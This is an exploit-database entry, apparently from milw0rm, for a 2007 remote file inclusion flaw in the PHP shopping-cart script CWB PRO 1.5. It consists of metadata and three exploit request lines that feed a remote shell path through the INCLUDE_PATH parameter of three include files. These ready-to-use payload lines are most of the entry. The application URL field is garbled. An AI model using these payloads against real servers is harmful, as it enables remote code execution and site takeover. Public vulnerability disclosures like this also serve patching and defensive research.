CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-03-31
date_updated: 2016-09-30
verified: 1
codes: OSVDB-35228;CVE-2007-1809;OSVDB-35227;OSVDB-35226
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.com373_cwbs1.5_demo.zip
# CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites
# D.Script: http://codewalkers.com/codefiles/373_cwbs1.5_demo.zip
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/include/cls_headline_prod.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_listorders.php?INCLUDE_PATH=Shell
# Exploit:[Path]/include/cls_viewpastorders.php?INCLUDE_PATH=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# milw0rm.com [2007-04-01]